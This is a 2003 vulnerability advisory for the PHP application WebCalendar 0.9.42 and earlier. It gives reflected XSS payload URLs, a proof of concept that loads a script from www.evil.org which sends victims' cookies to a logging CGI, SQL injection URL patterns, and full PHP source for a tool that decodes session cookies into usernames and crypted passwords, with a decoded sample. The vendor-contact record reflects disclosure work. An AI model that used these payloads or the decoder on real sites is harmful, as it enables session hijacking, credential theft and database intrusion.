Webcalendar <= 0.9.42 Cross Site Scripting Attacks and Potential SQL Injection Attack
Webcalendar <= 0.9.42
http://webcalendar.sourceforge.net/
WebCalendar is a PHP application used to maintain a calendar for one or more
persons
Cross Site Scripting
========================================
Files (Mabe Others):
----------------------------
includes/js/colors.php
Code Sniplet:
[...]
window.opener.document.prefform.<?php echo $color?>.value= color;
[...]
Exploit:
---------------------------
http://www.host.name/webcalendar/colors.php?color=</script><script>alert(document.cookie)</script>
Files (Mabe Others):
-------------------------
week.php
Code sniplet:
[...]
echo html_for_add_icon ( date ( "Ymd", $days[$d] ), $time_h, $time_m, $user
);
[...]
Exploit:
--------------------
http://www.host.name/webcalendar/week.php?user=";><script>alert(document.cookie)</script>
Files (Mabe Others):
-------------------------
day.php month.php week_details.php view_l.php view_m.php view_t.php view_v.php
view_w.php week_details.php
Code Sniplet:
[...]
echo $eventinfo;
[...]
Exploit:
----------------
http://www.host.name/webcalendar/week.php?eventinfo=<script>alert(document.cookie)</script>
POC:
-----------------
http://www.host.name/webcalendar/week.php?eventinfo=<script
src=http://www.evil.org/evilcode.js</script>
"evilcode.js"
<--------------->
window.open('http://www.evil.org/cgi-bin/logcookie.cgi?'+document.cookie);
<--------------->
We can then use the code provided in the files includes/functions.php and
includes/validate.php
to decode the "webcalendar_session" hash taken from the cookie. PHP source to
decode the hash should be attached.
>From functions.php:
<----------------->
// Extract a user's name from a session id
// This is a lame attempt at security. Otherwise, users would be
// able to edit their cookies.txt file and set the username in plain
// text.
<----------------->
Source: http://nocon.darkflame.net/CSS/decode.txt
Demo: http://nocon.darkflame.net/CSS/decode.php
Example:
webcalendar_session=838ea889b26c9772819d709b826e7b8f926d;
Hash: 838ea889b26c9772819d709b826e7b8f926d
Decoded:
Login: demo
Passw: Mn7ggQrGTEpi2
We can then run a standard unix password cracking program on "Mn7ggQrGTEpi2"
Potential SQL Injection:
============================
This seems to affect the view_t.php, view_w.php, view_v.php and maybee
others.
http://www.host.name/webcalendar/view_m.php?id=additional sql command
If "magic quotes" is set to off, then login.php is also vulnerable.
http://www.host.name/webcalendar/login.php?user='additional%20sqlcommand
http://www.host.name/webcalendar/login.php?password='additional%20sql%20command
----------------------------------------------------------------------------------------
Author Contacted on: Tue, 29 Jul 2003
Response:
From: Craig Knudsen <cknudsen@xxxxxxxxxxxx>
Subject: Re: Webcalendar Vulnerabilities
The source of most of these security issues is the use of global
variables, which seemed to be the way to back in PHP3. I've tried to
maintain compatibility to PHP3, but I'm thinking it's not worth the
security risks at this point. I will likely drop the use of global
variables in one of the next couple of releases.
In the mean time, I'll take a look at the issues you've listed here.
Thanks.
Craig
Requested Update on: Tue, 2 Sep 2003
Response: NONE
----------------------------------------------------------------------------------------
Advisory:
http://nocon.darkflame.net/CSS/Wecalendar.txt
Addtional Resources:
- WWW Security White Paper
http://www.discover.co.uk/www-secuirity.html
- Perl: http://www.developer.com/lang/article.php/861781
- PHP: http://www.phpadvisory.com/articles/view.phtml?ID=5
- SQL Injection:
http://www.ngssoftware.com/papers/advanced_sql_injection.pdf
- HTML Code Injection and Cross-site scripting
http://www.technicalinfo.net/papers/CSS.html
- Google is your friend ;)
http://www.google.com
- nocon
Date: Wed Sep 3 2003
http://nocon.darkflame.net/
<head>
<title> Webcalendar Cookie Decode </title>
</head>
<form method=post action="<? echo $PHP_SELF ?>">
<table width="200" border="0" cellspacing="1" cellpadding="0" bgcolor="#000000">
<tr><td>
<table width="100%" border="0" cellspacing="2" cellpadding="2"
bgcolor="#FFFFFF">
<tr align="center">
<td colspan="2">Webcalendar Cookie Decode <br> <a
href=http://nocon.darkflame.net/>
http://nocon.darkflame.net/</a> <br><br>
</td>
</tr>
<tr>
<td><strong>Hash</strong></td>
<td align="right"><input type="text" name="hash" size="60"></td>
</tr>
<tr>
<td> </td>
<td align="center"> <input type="submit" value="Decode"></td>
</tr>
</table>
</td>
</tr>
</table>
</form>
<?php
$encoded_login = $HTTP_POST_VARS['hash'];
$offsets = array ( 31, 41, 59, 26, 54 );
function hextoint ( $val ) {
if ( empty ( $val ) )
return 0;
switch ( strtoupper ( $val ) ) {
case "0": return 0;
case "1": return 1;
case "2": return 2;
case "3": return 3;
case "4": return 4;
case "5": return 5;
case "6": return 6;
case "7": return 7;
case "8": return 8;
case "9": return 9;
case "A": return 10;
case "B": return 11;
case "C": return 12;
case "D": return 13;
case "E": return 14;
case "F": return 15;
}
return 0;
}
function decode_string ( $instr ) {
global $offsets;
$orig = "";
for ( $i = 0; $i < strlen ( $instr ); $i += 2 ) {
$ch1 = substr ( $instr, $i, 1 );
$ch2 = substr ( $instr, $i + 1, 1 );
$val = hextoint ( $ch1 ) * 16 + hextoint ( $ch2 );
$j = ( $i / 2 ) % count ( $offsets );
$newval = $val - $offsets[$j] + 256;
$newval %= 256;
$dec_ch = chr ( $newval );
$orig .= $dec_ch;
}
return $orig;
}
$login_pw = split('\|', decode_string ($encoded_login));
$login = $login_pw[0];
$cryptpw = $login_pw[1];
echo "<b> Login:</b> $login <br>";
echo "<b> Passw:</b> $cryptpw <br>";
?>